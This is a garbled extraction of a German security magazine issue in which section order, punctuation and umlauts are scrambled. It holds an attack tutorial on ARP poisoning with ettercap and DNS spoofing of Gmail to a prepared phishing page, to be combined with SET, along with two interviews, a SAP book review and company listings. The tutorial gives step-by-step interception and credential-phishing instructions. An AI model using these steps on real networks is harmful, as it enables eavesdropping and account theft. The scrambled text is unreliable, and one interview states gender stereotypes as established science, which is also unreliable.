Subnet angepingt werden (Bild 3)
Ist auch das durchgestanden so koumlnnen die Ziele un-
ter Hosts gt Hosts list ausgewaumlhlt werden Als Target 1
muss der Router oder Gateway und das Opfer als Tar-
get 2 ausgewaumlhlt werden Hier muss gegebenenfalls
mit nmap nach gepruumlft werden um die IP des Opfers zu
identifizieren
Nun kann mit dem Selektieren von Mitm gt Arp poiso-
ning die ARP-Attacke gestartet und Schritt 1 somit be-
endet werden
Wird nun Wireshark oder tcpdump gestartet so kann
man allen Netzwerkverkehr des Opfers und des Rou-
ters Gateways mitgehoumlrt werden
Nun gleich weiter zu Schritt 2 Nachdem die Man-in-
the-Middle-Attacke steht koumlnnen wir dem Opfer nun
unsere DNS-Records aufzwingen
Dazu verwenden wir die ettercap-Plugins unter dem
Punkt Plugins gt Manage the plugins Da waumlhlen wir den
Punkt dns_spof aus
Und somit ist unser DNS-Spoofing-Angriff einsatzfauml-
hig und aktiv
Wem als Angreifer kein GUI zur Verfuumlgung steht der
kann auch den interaktiven Modus von ettercap ver-
wenden Dazu muss ettercap nur mit der Option -T auf-
gerufen werden Alles weitere ist dann in der Hilfe (h-
Taste) nachzulesen
Nun ist alles getan Jedes mal wenn nun unser Op-
fer die Webseite von Gmail aufruft wird es auf unsere
praumlparierte Seite umgeleitet ohne dass es davon etwas
merkt
In Kombination mit SET erhaumllt ein Angreifer so muumlhe-
los Zugriff auf ein fremdes System
Listing 1 ein A-Record fuumlr eine praumlparierte Seite von gmailcom
gmailcom A 127001
gmailcom A 127001
Abbildung 3 GTK-GUI von ettercap
Linkshttpseiconch Unternehmen des Autorshttpblogencodingitch
PATRICK SCHMIDDer Autor ist System Engineer im Bereich Linux Unix und unterstuumltzt nebenbei die Entwicklung und Verbreitung von Li-nux und Opensource im privaten wie auch im professionellen Umfeld
Interview mit Tobias Glemser
hakin9orgde 41
hakin9 Erzaumlhlen Sie uns bitte ein wenig uumlber sich selbst wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie sich mit IT-Sicherheit Branche beschaumlftigenTobias Glemser Mein Name ist Tobias Glemser ich bin leitender IT-Sicherheitsberater bei der Tele-Consul-ting security networking training GmbH in Gaumlufelden bei Stuttgart und verantwortlich fuumlr den Geschaumlftsbereich Penetrationstests Zu Schul- und Zivildienstzeiten hatte ich bereits den ersten Kontakt mit technischen Audits und habe schlicht das Hobby zum Beruf gemacht Seit uumlber zehn Jahren bin ich in entsprechenden Projekten taumltig Am Wichtigsten ist der kreative Umgang mit Sys-temen und Anwendungen Funktionen die ein Entwick-ler nach besten Wissen und Gewissen implementiert hat so zu nutzen dass sie nicht mehr dem urspruumlngli-chen Zweck dienen Im Projektumfeld erhaumllt man viele Einblicke in Techniken und Prozesse in unterschiedli-chen Firmen und Behoumlrden z B Energie Flugraum-uumlberwachung Banken Neben den technischen Aspek-ten ist es mein und unser Ziel mit allen Beteiligten des Kunden ein gemeinsames Ziel zu erreichen So waumlre es aus meiner Sicht unsinnig technische Schwachstellen mit rein technischen Hilfestellungen zu beheben Der Ansatz springt deutlich zu kurz Vielmehr geht es auch darum auf Prozesse abzuleiten und diese zu verbes-sern Diese Nachhaltigkeit und die positiven Ruumlckmel-dungen treiben an Daruumlber hinaus bin ich frei in der Beratung d h wir haben keine Produkte im Portfolio die bei einem technischen Audit moumlglichst gleich mit an-gepriesen werden muumlssen
hakin9 Bereits bei mehreren tausend Tests von Netzen und Systemen haben Sie den selbstentwickelten Security Scanner tajanas genutzt Was unterscheidet tajanas von anderen solchen WerkzeugenTobias Glemser Wir haben tajanas zunaumlchst fuumlr ei-gene Zwecke entwickelt und setzten es auch heute als Basis in Penetrationstests ein tajanas ist ein Frame-
work und Webfrontend fuumlr die grundsaumltzliche Pruumlfung eines Systems mit automatisierten Port- und Vulnera-bility-Scans und einheitlichem Reporting pro System Wir haben dabei das Ziel verfolgt nicht das Rad neu zu erfinden sondern etablierte Programme fuumlr die ei-gentlichen Pruumlfungen zu nutzen Die Ergebnisse der einzelnen Schritte werden analog zu einer manuellen Pruumlfung mit den jeweiligen Programmen automatisiert verknuumlpft Dies ermoumlglicht eine wesentliche schnellere Durchfuumlhrung bei gleicher Ergebnis-Qualitaumlt Daruumlber hinaus ist die Oberflaumlche so gehalten dass nur die not-wendigsten Optionen zur Verfuumlgung stehen
Neben der Schwachstellen-Pruumlfung ist auch eine Erreichbarkeitspruumlfung integriert um einen schnellen Uumlberblick uumlber aktive Systeme in Netzen zu erhalten
Es ist wichtig zu verstehen dass Penetrationstests ohne automatisierte Tests nicht funktionieren Die schie-re Anzahl an Schwachstellen laumlsst sich nur sinnvoll mit entsprechenden Programmen pruumlfen Die Ergebnisse sind dann die Basis fuumlr weitere manuelle Tests Dabei wird mit Know-How und Kreativitaumlt versucht weitere Luumlcken zu finden um und diese dann auszunutzen
hakin9 Wie erfolgt die Bedienung des Scanners und welche Lizenzen und Module existierenTobias Glemser Die Bedienung erfolgt vollstaumlndig uumlber eine webbasierte Oberflaumlche tajanas wird als VM-ware- oder Hardware-Appliance ausgeliefert der End-benutzer kann alle Funktionen ndash dazu gehoumlren auch Ak-tualisierungen ndash uumlber die Weboberflaumlche nutzen Jeder Nutzer erhaumllt natuumlrlich trotzdem vollstaumlndigen Root-Zu-griff auf das System Die Lizenzierung erfolgt pro In-stallation eine Limitierung auf IP-Adressen oder eine gewisse Anzahl Scans erfolgt nicht Neben dem Audit-Modul gibt es auch ein Modul fuumlr die Erreichbarkeits-pruumlfung
hakin9 Woher kommt der Name tajanasTobias Glemser tajanas steht fuumlr bdquothis ainrsquot just ano-ther network scannerrdquo ndash weil es ein wie beschrieben ein
bdquoSicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollinstrument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgreichen Produkts gesehen werdenldquoInterview mit Tobias Glemser
10201042
INTERVIEW
Nach der Durchfuumlhrung erhaumllt der Kunde einem umfas-senden auf seine Umgebung und Realitaumlt angepass-ten Ergebnisbericht der im Rahmen eines Abschluss-Workshops mit den technischen verantwortlichen besprochen wird Auf Wunsch erfolgt auch die Darstel-lung vor dem Vorstand bzw der Leitungsebene
Das Spektrum eines Penetrationstests ist sehr viel-faumlltig und laumlsst sich nur schwer darstellen Es handelt sich dabei jedoch nicht zwingend um die bdquobekanntenldquo Pruumlfungen auf Serversysteme Haumlufige Einfallstore fuumlr Angreifer sind schlecht gesicherte lokale Netzwerke Client-Systeme oder auch Multifunktionsdrucker Bei Interesse finden sich Informationen z B in der Studie Penetrationstests des BSI dem Whitepaper Penetrati-
onstests der Tele-Consulting oder auch dem Whitepa-per Projektierung der Sicherheitspruumlfung von Weban-
wendungen der OWASP
hakin9 Welche Plaumlne die IT-Sicherheit Branche betreffend haben Sie noch vorTobias Glemser Abseits von technischen Audits ver-suchen wir ganzheitliche Prozesse vor allem aber nicht nur in den IT-Abteilungen zu etablieren und dabei Ad-ministratoren die Hilfestellungen zu geben die sie da-bei benoumltigen Als Sicherheitsberater oder auch Sicher-heitsbeauftrager eines Unternehmens nimmt man meist die Rolle eines Kontrolleurs ein der darauf achtet dass Regeln eingehalten werden Hier ist ein Wandel erfor-derlich sowohl bei denen die sich bdquoSicherheitldquo auf die Fahnen schreiben als auch bei den Administratoren und Verantwortlichen fuumlr Geschaumlftsbereiche und deren Technik Sicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollin-strument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgrei-chen Produkts gesehen werden Hier muumlssen auch und vor allem Sicherheitsberater umdenken um vorrangig als Unterstuumltzer die sie sind gesehen und akzeptiert zu werden Nur so begreifen die technisch verantwort-lichen Mitarbeiter Sicherheitspruumlfungen nicht als Pruuml-fungen ihrer persoumlnlichen Kompetenz sondern als kon-krete Unterstuumltzung fuumlr die Verbesserung vorhandener Sicherheitsprozesse
Im Bereich der technischen Schwachstellen werden weiterhin Webanwendungen eine groszlige Rolle spielen Daher bin ich seit geraumer Zeit beim Open Web Appli-cation Security Project (OWASP) den meisten vermut-lich durch die OWASP Top 10 bekannt ehrenamtlich taumltig und seit diesem Jahr im Board der deutschen Sek-tion Beim OWASP Stammtisch Stuttgart (und Stamm-tischen in anderen Staumldten) tauschen sich hier auch Menschen rund um das Thema zwanglos aus Wer Lust hat vorbeizukommen kann sich auf der deutschen OWASP Webseite informieren
Wir bedanken uns fuumlr das Gespraumlch
Framework darstellt und nicht den n-ten Port- oder Vul-nerability-Scanner Wenn wir Bugs in den verwendeten Programmen feststellen oder Ideen fuumlr Erweiterungen haben geben wir diese direkt in die Community zuruumlck
hakin9 Wer sind Benutzer von tajanasTobias Glemser Zum einen natuumlrlich wir selbst Zum anderen setzten IT-Sicherheitsbeauftragte und IT-Revi-soren das Tool fuumlr regelmaumlszligige Sicherheitspruumlfungen ihrer Netze ein
hakin9 Fuumlr welche Faumllle reichen Penetrationstests nicht ausTobias Glemser Das haumlngt von der Zieldefinition des Kunden ab und was man unter einem Penetrationstest versteht Bei Tele-Consulting sind alle Mitarbeiter nicht nur in technische Audits wie Penetrationstests eingebun-den sondern auch in prozessorientierte Beratungen und Audits wie z B ISO 27001 oder BSI IT-Grundschutz Dies ermoumlglicht es uns in technischen Audits nicht nur die technischen Luumlcken aufzuzeigen sondern auch auf fehlende oder mangelhafte Prozesse hinzuweisen und konkrete Vorschlaumlge zur Verbesserung zu geben
hakin9 Koumlnnen Sie uns ein konkretes Beispiel nennenTobias Glemser Nehmen wir an dass aus Wirtschaft-lichkeitsgruumlnden nicht alle Server in einem Netz in ein technisches Audit einbezogen werden sondern nur eine definierte Anzahl Stellt man hier Schwachstellen fest so genuumlgt es nicht die erkannten Schwachstellen oder gar Luumlcken zu schlieszligen sondern man muss sich fra-gen wie es zu den Schwachstellen kommen konnte In den seltensten Faumlllen haben hier Administratoren indi-viduelle Fehler gemacht vielmehr scheinen offensicht-lich die Vorgaben zur Serverkonfiguration bzw Haumlrtung nicht ausreichend zu sein bzw diese in ein Information Security Management System (ISMS) integriert zu sein Darauf weisen wir nachdruumlcklich in unseren Ergebnis-berichten hin um eine Gesamtverbesserung zu erzie-len und unterstuumltzen bei Bedarf auch bei der Umset-zung der organisatorischen Anteile
Geht man diesen Schritt nicht werden erfahrungs-gemaumlszlig nur die Systeme veraumlndert bei denen im Test Schwachstellen erkannt wurden Der Verbesserung der Gesamtsicherheit hilft dies dann allerdings nicht
hakin9 Wie sieht eine Sicherheitsuumlberpruumlfung mithilfe des Penetrationstests ausTobias Glemser Zunaumlchst bedarf es einer klaren Ziel-vorstellung Entweder haben Kunden diese bereits oder sie wird im Rahmen eines Workshops gemeinsam erarbeitet Dabei ist es meist sinnvoll mehrstufig vorzu-gehen und die Themen in verschiedenen Arbeitspake-ten abzuarbeiten Im Rahmen eines Kick-Offs werden die Beteiligten informiert und in den Ablauf integriert
10201044
INTERVIEW
hakin9 Lassen Sie uns bitte ein wenig uumlber sich selbst wissen wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie in der IT-Branche taumltig sindUlrike Peter Ich bin PR-Spezialistin und Journalis-tin durch und durch Die Liebe zum Schreiben ent-deckte ich fruumlh Nach ersten Gehversuchen als freie Mitarbeiterin bei einer Tageszeitung absolvierte ich vor zehn Jahren ein Volontariat in einer PR-Agentur mit parallelem Fernstudium bdquoJournalismusldquo Die ers-ten Tage in der Agentur waren wie ein Kopfsprung ins kalte Wasser Denn obwohl ich das journalistische Ruumlstzeug besaszlig wusste ich anfangs nicht mal wo sich die Escape-Taste an meinem PC befand hatte aber die Aufgabe ohne spezielles Hintergrundwissen uumlber komplexe Technologien detaillierte Berichte zu formulieren Da dies den Ehrgeiz in mir weckte ar-beitete ich mich schnell in die Materie ein und stell-te fest dass Public Relations in Verbindung mit der Erstellung technologischer Texte mein Steckenpferd ist Heute bin ich Geschaumlftsfuumlhrerin meiner eigenen PR-Agentur und obwohl ich mittlerweile auch in wei-teren Branchen und Aufgabengebieten zuhause bin ist die Freude daran bdquotrockeneldquo und komplexe Inhalte lebendig werden zu lassen noch genauso vorhanden wie am ersten Tag
hakin9 Viele glauben dass Computer Maumlnnersache sind Was halten Sie davonUlrike Peter Die landlaumlufige Meinung existiert nach wie vor dass Maumlnner ein besseres technologisches Verstaumlndnis mitbringen Dies resultiert nicht selten aus Vorurteilen laumlsst sich aber auch nicht komplett abstreiten Denn nicht nur Erfahrungswerte sondern auch Belege aus der Hirnforschung zeigen dass Frauen besser mit Sprache umgehen koumlnnen und Maumlnner sich in Naturwissenschaften wohler fuumlhlen Es liegt wohl ein Stuumlck weit in der Natur der Sache
Aber wie heiszligt es so schoumln bdquoAusnahmen bestaumltigen die Regelldquo Und der Trend zeigt beispielsweise dass Frauen zunehmend technische Studiengaumlnge bele-gen
hakin9 Heutzutage sind wir uumlberall von Computern umgeben In der IT-Branche herrscht trotzdem ein Frauenmangel Woran liegt dies Ihrer Meinung nachUlrike Peter Noch lockt es wesentlich mehr Maumlnner in technische Berufe als Frauen Ich denke das Verhaumlltnis wird auch in Zukunft so bleiben ndash auch wenn sich die klassische Rollenverteilung verschiebt und die bdquoGren-
bdquoErfolgreiche Frauen in der IT-Branche - ein Erfahrungsberichtldquo
Interview mit Ulrike Peter
Interview mit Ulrike Peter
hakin9orgde 45
Vorgesetzten und zum anderen nach den Faumlhigkeiten der Frau Jeder Mitarbeiter der neu eingestellt wird steht vor der Aufgabe sich zu beweisen ndash und sollte die Moumlglichkeit dazu erhalten Jedoch werden Frau-en in typischen Maumlnnerberufen oft kritischer beaumlugt und stehen laumlnger auf dem Pruumlfstand Dies passiert teils unbewusst Auch beweisen Studien immer wie-der dass maumlnnliche Arbeitnehmer im gleichen Job mehr verdienen als weibliche Hier macht die Gesell-schaft aber eine Entwicklung durch und dies reguliert sich sicherlich zumindest ein Stuumlck weit im Laufe der naumlchsten Jahre
hakin9 Was macht Ihnen am meisten Spaszlig bei der Arbeit in der IT-BrancheUlrike Peter Bevor ich mich selbstaumlndig machte war ich bereits in einem anderen Unternehmen in der Ge-schaumlftsleitung taumltig ndash jedoch konnte ich den Stift zum Schreiben nie aus der Hand legen Es reizt mich im-mer wieder neue technologische Themen zu erkunden und dabei nicht nur an der Oberflaumlche zu kratzen son-dern Detailtiefe zu erlangen um fundiert und lesens-wert uumlber ein Thema berichten zu koumlnnen Im Laufe der Jahre habe ich eine starke Affinitaumlt zur IT-Security entwickelt Ich finde es spannend uumlber Sicherheits-luumlcken Verschluumlsselungstechniken und vieles weite-re zu schreiben Daruumlber hinaus macht es mir groszligen Spaszlig IT-Unternehmen durch die richtige PR-Strategie nach vorn zu bringen und entsprechende Maszlignahmen in die Tat umsetzen Beim Kennenlernen eines poten-ziellen Neukunden im ersten Moment manchmal hin-sichtlich der technischen Fachkompetenz unterschaumltzt zu werden und dann schnell durch Know-how zu uumlber-zeugen bestaumltigt mich immer wieder in dem was ich tue
hakin9 Was sollte unternommen werden um die Ressentiments von Frauen gegenuumlber IT-Jobs abzubauenUlrike Peter Ich glaube dem kann man bzw Frau nur entgegenwirken indem sie den Mut hat ihre Interessen zu verfolgen und sie unter Beweis zu stellen Aus Er-fahrung wenn jemand seine Faumlhigkeiten zeigt und en-gagiert an eine Sache herangeht ruumlckt das Geschlecht automatisch in den Hintergrund
Wir bedanken uns fuumlr das Gespraumlch
zenldquo in beide Richtungen mehr und mehr verschwim-men Denn auch Maumlnner finden wir heute in Berufen die vor Jahren ausschlieszliglich Frauen zugeordnet wur-den Und wir sind zwar von elektronischen Geraumlten wie PCs Smartphones etc umgeben und diese werden auch rege von beiden Geschlechtern genutzt ndash aber ei-nen technischen Job zu ergreifen ist ein anderes paar Schuhe Hierzu gehoumlrt ein besonderes Faible Die Be-weggruumlnde weshalb in diesem Segment Frauenman-gel herrscht sind meiner Meinung nach Ihnen fehlt manchmal der Mut sie erhalten nicht immer die glei-chen Chancen oder ndash und das wird der Hauptgrund sein ndash es liegen schlichtweg die Interessen in anderen Be-reichen
hakin9 Woraus resultieren die Vorurteile gegen die Frauen die sich mit Computern beschaumlftigenUlrike Peter Die IT ist (und bleibt es sicher auch) eine Maumlnnerdomaumlne ndash Frauen in der IT-Branche sind Para-diesvoumlgel Wie in allen Berufen in denen seit jeher ein Geschlecht etabliert ist sich Prozesse eingeschliffen und bewaumlhrt haben ist es erst einmal fremd und ge-woumlhnungsbeduumlrftig wenn sie sich veraumlndern So liegen die Vorurteile zum einen daran dass es nicht uumlblich ist wenn Frauen in diesen Berufen arbeiten und Maumlnnern die bdquoTechnikldquo zugeordnet wird ndash zum anderen resultie-ren sie daraus dass die unterschiedlichen Faumlhigkeiten und Interessen der Geschlechter einfach naturgege-ben sind So wie kleine Jungen mit Autos spielen und Maumldchen mit Puppen stecken auch spaumlter gewisse Verhaltensweisen und Interessen in uns die bereits in der Kindheit gepraumlgt werden Greift das weibliche Ge-schlecht im Berufsleben ploumltzlich zum bdquoAutoldquo so ist dies ungewoumlhnlich und wird erst einmal hinterfragt
hakin9 Wie sieht die Situation von Frauen in der IT-Branche aus Ist es leicht als begabte IT-Expertin einen Job in einem Unternehmen zu bekommenUlrike Peter Frauen in der IT-Branche sind haumlufig in Marketingabteilungen zu finden ndash aber zum Beispiel auch bei der schreibenden Zunft in Fachverlagen In diesen Jobs herrscht in meinen Augen Chancengleich-heit Als IT-Expertin in einem technischen Beruf wie Ad-ministrator Entwickler oder Aumlhnliches sieht es dagegen anders aus In diesem Segment haben es weibliche Fachkraumlfte meiner Ansicht nach schwerer Die Huumlrde zum Bewerbungsgespraumlch eingeladen zu werden ist houmlher Bekommt sie die Chance dazu wird vielleicht et-was genauer hingeschaut aber letztlich zaumlhlt die Kom-petenz die unterm Strich den entscheidenden Aus-schlag geben wird
hakin9 Wie werden Frauen von Maumlnnern als ihre Mitarbeiter wahrgenommenUlrike Peter Dies laumlsst sich nicht pauschalisieren und richtet sich zum einen nach der Einstellung des
10201046
REZENSIONEN
Das Buch SAP for DFPS Implementierung und Customizing basiert auf mehr als 20 Jahren Er-fahrung die die Autoren insgesamt bei der Ent-
wicklung Implementierung aber auch Schulung der Loumlsung sammeln konnten
Die uumlber 650 Seiten vollgepacktes Wissen sollten sie nicht abschrecken dieses Buch in die Hand zu nehmen Es ist sehr gut und fluumlssig geschrieben Man schafft es sollten sie ein schneller LeserIn sein in zwei Tagen
Sie benoumltigen keine tiefgreifenden SAP-Kenntnisse zum Verstaumlndnis daher ist es fuumlr Entscheider genauso geeignet wie fuumlr Projektleiter Architekten funktionale Mitarbeiter Basismitarbeiter oder externe Berater
Komplexe Zusammenhaumlnge werden sehr schoumln und bildhaft beschrieben damit auch fuumlr den SAP-Laien das Vorgehen verstaumlndlich beschrieben wird Erwaumlh-nenswert finde ich in diesem Zusammenhang Rubiks Zauberwuumlrfel
Das Buch ist sehr strukturiert aufgebaut und umfasst unverzichtbare Grundlagen in den Teilen I-IIIFuumlr Experten wird es dann in Teil IV richtig spannend und interessant
Die von SAP entwickelte fast eierlegende Wollmilch-sau erfordert ein umfangreiches Nachschlagewerk zur Implementierung Den Autoren ist dies hiermit gelun-gen
Ihnen ist es auszligerdem gelungen aufzuzeigen wie komplexe bdquoUnternehmensstrukturenldquo bewaumlltigt und Kos-ten reduziert und kontrolliert werden koumlnnen
Das Beispielprojekt bdquoTsunamildquo verdeutlicht dabei an einem nicht so komplexen Projekt die Anforderungen Beleuchtet wird zB wie militaumlrische Kernprozesse wie etwa die Logistik substanzielle Einsparungen von ca 30 erzielen koumlnnten als auch die Unterstuumltzung von Einsaumltzen verbessert werden koumlnnten (Beschleunigung der Verlegung um bis zu 50 -70)
Des Weiteren wird die Interoperabilitaumlt sehr schoumln he-raus gestellt und die integrativen Aspekte stets im Blick behalten
Hervorheben sollte man die organisatorische Flexi-bilitaumlt und Logistik wie das Logistic Assessment Pro-zessmanagement Qualification Management inkl der Uumlbernahme von Trainingsdaten das Managementkon-zept BSC (Balanced Scorcard) die Einsatzmoumlglichkei-ten von mobilen Anwendungen fuumlr Schutzaufgaben SOA und NCW bzw NetFuumlOp mit DFPS
Der Mehrwert wird zB am Meldewesen der NC3A durch Automatisierung von weiten Teilen schoumln heraus gearbeitet
Die ausfuumlhrlichen bebilderten Beispiele stellen eine gelungene Verbindung zwischen Theorie und Praxis bzw Anwendung dar In der SAP-typischen Struktur wurden die neuen und bereits erwaumlhnten Funktionen sinnvoll und gekonnt integriert
Des Weiteren findet sich fuumlr die richtige IT-Architektur ein schoumln gefuumlllter Werkzeugkasten mit den dazuge-houmlrigen Dorsquos and Dontrsquos Natuumlrlich darf auch das best practices nicht fehlen sowie der Ausblick auf zukuumlnftige Entwicklungen
Egal ob sie sich fuumlr eine Neuintegration oder eine Co-re2Defense Loumlsung entscheiden
die Kapitel zu den Themen
moumlchte ich ihnen unbedingt ans Herz legen
FAZITDieses Buch sollte keinem Entscheider und IT-Verant-wortlichen vorenthalten werden
Praumldikat besonders empfehlenswert
Autor Nicole Huck
SAP for DFPSImplementierung und CustomizingGalileo Press Bonn 20101 Auflage 2010AutorenBernhard EscherichHeinrich PfriemerWolfgang Ullwer
Datenschutz ist EU-weit gesetzliche Anforde-
rung Wir sorgen fuumlr die Erfuumlllung rechtlicher
Vorschriften und kuumlmmern uns um ein ange-
messenes Datenschutzniveau in Ihrem Unter-
nehmen auch international
wwwblossey-partnerde
Recommended Sites
Securitymanagerde ist eine Produktion des
Online-Verlag FEiG amp PARTNER Seit dem
Start hat sich Securitymanagerde zu einem
fuumlhrenden Online-Informationsportal in
Deutschland entwickelt und versteht sich als
unabhaumlngiger Informationsdienstleister der
IT- und Information-Security-Branche
wwwsecuritymanagerde
Pericom base camp IT-Security Unser Ziel ist
es unsere Kunden vor moumlglichen Gefahren
fuumlr Ihre IT-Infrastruktur bestmoumlglich zu schuumlt-
zen Neben der Analyse von Risikopotentia-
len durch Security Audits bieten wir durch
die Implementierung von Security-Loumlsungen
Schutz vor konkreten Gefahren
wwwpericomat
Happy-Security ist ein neues Portal mit Secu-
rity-Challanges IT-Quiz Web-Bibliothek Multi-
media-Center amp vielen weiteren Features
wwwhappy-securityde
CloudSafe stellt seinen Nutzern eine Plattform
zur kryptographisch sicheren Ablage und Verwal-
tung von sensiblen Daten zur Verfuumlgung Nutzer
koumlnnen auf CloudSafe beliebig viele Dokumente
in virtuellen Safes ablegen Es koumlnnen weite-
ren Personen individuelle Zugriffsrechte auf die
Safes eingeraumlumt und somit ein sicherer Daten-
austausch ermoumlglicht werden
wwwcloudsafecom
AV-Comparatives geht hervor aus dem Inns-
brucker Kompetenzzentrum und gilt als eines
der bekanntesten unabhaumlngigen Testhaumluser
fuumlr Antiviren-Software
wwwav-comparativesorg
Die Seed Forensics GmbH bietet fuumlr Strafver-
folgungsbehoumlrden professionelle Unterstuumltzung
in den Bereichen der Datensicherstellung und
Datentraumlgerauswertung Selbstverstaumlndlich
entsprechen unsere Mitarbeiter unser tech-
nisches Equipment und auch unsere Raumlumli-
chkeiten den notwendigen Anforderungen
wwwseed-forensicsde
Wollen Sie Ihre Seite empfehlen kontaktieren Sie bitte dehakin9org
Die Netzwerktechnik steht auf wwweasy-ne-
tworkde im Mittelpunkt Artikel Tutorials und
ein Forum bieten genuumlgen Stoff fuumlr kommende
wwweasy-networkde
Computerfreaks houmlher schlagen laumlsst Geek
Wear mit intelligenten Spruumlchen eine riesige
Auswahl Gadgets und natuumlrlich auch viele
Hacker Tools
wwwgetDigitalde
Recommended Companies
SEC ConsultSEC Consult ist der fuumlhrende Berater
fuumlr Information Security Consulting in
Zentraleuropa Die vollstaumlndige Unab-
haumlngigkeit von SW- und HW-Herstellern
macht uns zum echten Advisor unserer
Kunden Unsere Dienstleistungen umfa-
ssen externeinterne Sicherheitsaudits
(Web-) Applikationssicherheit (ONR 17-
700) Sicherheitsmanagement-Prozesse
(ISO 27001) etc
wwwsec-consultcom
SEC Consult
Tele-Consulting GmbH
Sicherheit hakin9 und crsquot Autoren jah-
relange Erfahrung bei der Durchfuumlhrung
von Penetrationstests und Security-Au-
dits eigener Security Scanner bdquotajanasrdquo
Sicherheitskonzepte Risikoanalysen
ISO 27001-Auditoren VoIP-Planung
und -Security
wwwtele-consultingcom
B1 SystemsDie B1 Systems ist international taumltig
in den Bereichen LinuxOpen Source
B1
Systems spezialisiert sich in den Be-
reichen Virtualisierung und Cluster
infob1-systemsde
wwwb1-systemsde
Blossey amp Partner
Consulting DatenschutzbuumlroDatenschutz ist EU-weit gesetzliche An-
forderung Wir sorgen fuumlr die Erfuumlllung
rechtlicher Vorschriften und kuumlmmern
uns um ein angemessenes Daten-
schutzniveau in Ihrem Unternehmen
auch international Wir erledigen alle er-
forderlichen Aufgaben die Faumlden behal-
ten Sie in der Hand Nutzen Sie unser
Erstberatungsgespraumlch
wwwblossey-partnerde
secXtreme GmbHschuumltzt Ihre Web-Anwendungen bis
auf Applikationsebene Dazu gehoumlrt
sowohl die Pruumlfung von Applikationen
(Pentests und Code-Reviews) als auch
Beratungsleistungen fuumlr Sicherheit im
Entwicklungsprozess und Schutzlouml-
sungen (Web Application Firewalls) bei
Mittelstand
wwwsec-Xtremecom
Mabunta
spezialisierter und kompetenter Partner
heitsfragen in allen Unternehmens-
bereichen verbinden Wachstum mit
sicherer Kommunikation
Alles in allem- mabunta bdquoone-face-to-
the-customerldquo Ihr Spezialist in Fragen
wwwmabuntade
Recommended Companies
SecureNet GmbH MuumlnchenAls Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen Anwendungs-Pentests Sour-
delines Beratung rund um den Software
Firewalls Application Scanner Fortify
wwwsecurenetde
underground_8
secure computing gmbhWir entwickeln und vertreiben securi-
und Antispam Unsere Loumlsungen sind
hardwarebasiert und werden uumlber Dis-
tributoren Reseller und Systemintegra-
toren implementiert und vertrieben
wwwunderground8com
OPTIMAbit GmbHWir sind Spezialisten fuumlr Entwicklung
und Mobile Applikationen gegen Angriffe
externer und interner Art Unsere Dien-
ste umfassen Audits Code Reviews
Penetrationstest sowie die Erstellung
von Policies Zusaumltzlich bieten wir Semi-
wwwoptimabitcom
m-privacy GmbH
einfach zu bedienen
So praumlsentieren sich die von m-privacy
tesiegel Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage Online-Razzien und
gezielten Angriffen
wwwm-privacyde
NESECNESEC ist Ihr Spezialist fuumlr Penetra-
tionstests Sicherheitsanalysen und
cherheitspruumlfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits Bei Bedarf optimieren
wir Ihre Policy sensibilisieren Ihre
nehmen nach ISO 27001
wwwnesecde
Seed Forensics GmbH
fuumlr Strafverfolgungsbehoumlrden profe-
ssionelle Unterstuumltzung in den
Bereichen der Datensicherstellung
und Datentraumlgerauswertung Selbst-
verstaumlndlich entsprechen unsere
Mitarbeiter unser technisches Equip-
0ment und auch unsere Raumlumlichkeiten
den notwendigen Anforderungen
wwwseed-forensicsde
Protea Networks
Loumlsungen Verschluumlsselung Firewall
ring etc Wir bieten umfassende Bera-
tung Vertrieb von Security-Hard- und
Software Installation und umfangreiche
nings) Protea setzt auf Loumlsungen der
dafuumlr direkten inhouse-Support bereit
wwwproteanetworksde
secadmsecadm ist durchtrainierter Spezialist fuumlr
Airbags ABS und Sicherheitsgurte in der
Mannjahren Erfahrung beraten entwi-
fuumlr Kunden weltweit Der Fokus liegt da-
und Security-Management Risiko-Analy-
se die Sicherheitsberatung Auditing Se-
curity-Leitfaumlden Software-Entwicklung
wwwsecadmde
10201038
ANGRIFF
Wieder ein Beispiel dazu (Bild 2)
les nicht mehr die MAC-Adresse des Zieles son-
dern die des Angreifers zugeordnet ist
Paketes seinen ARP-Cache nach der MAC-Adres-
se des Zieles ab Aber anstatt von seinem ARP-
Cache auch die MAC-Adresse des Zieles zu erhal-
ten bekommt er die des Angreifers welche er in to-
taler Unwissenheit in sein Paket packt
Pakete aus und vergleicht diese mit seiner Zuord-
nungstabelle Anhand der MAC-Adresse (die des
Angreifers) sendet er das Paket an Port 2 und so-
mit an den Angreifer und nicht wie vom Opfer ge-
plant an das Ziel
Somit geht der Verkehr aber erst vom Opfer zum An-
greifer
Damit das Oper davon aber nichts merkt muss der
Angreifer die abgefangene Anfrage an das Ziel weiter-
leitenNun verlaumluft die Kommunikation schon vom Op-
fer uumlber den Angreifer zum Ziel
Damit man aber auch den gesamten Verkehr in die an-
dere Richtungen also Anfragen und Antworten mitkriegt
macht man ARP-Attacken immer auf den Client und den
Router Gateway gleichzeitig womit nun eine Kommuni-
kation vom Opfer uumlber den Angreifer zum Ziel und auch
wieder zuruumlck moumlglich ist Damit ist die Man-in-the-Middle-
Attacke komplett und der Angreifer ist in der Lage den
gesamten Netzwerkverkehr seines Opfers nicht nur ab-
zufangen und mit zuhoumlren sondern auch beliebig zu ver-
aumlndern was uns auch sogleich zu Schritt 2 bringt
Im ersten Artikel haben wir als Beispiel die Seite Gmail
kopiert und praumlpariert Also wollen wir auch gleich dort
anknuumlpfen
Fuumlr diese Attacke werden wir das Tool ettercap ver-
wenden da es relativ einfach aufgebaut ist dabei aber
trotzdem viele Einstellungsmoumlglichkeiten bietet
Unsere Attacke wird in zwei Stufen aufgebaut sein
Als erstes muumlssen wir das Opfer oder besser dessen
Computer dazu bringen seinen ganzen Traffic auf un-
seren Computer umzuleiten also eine sogenannte
Man-in-the-middle-Attacke ausfuumlhren
Dazu werden wir ARP Spoofing verwenden ARP ist
ein Protokoll auf Layer 2 (Sicherung) um anhand einer
IP-Adresse die zugehoumlrige MAC-Adresse abzufragen
Die Funktionsweise von ARP Spoofing ist einfach Der
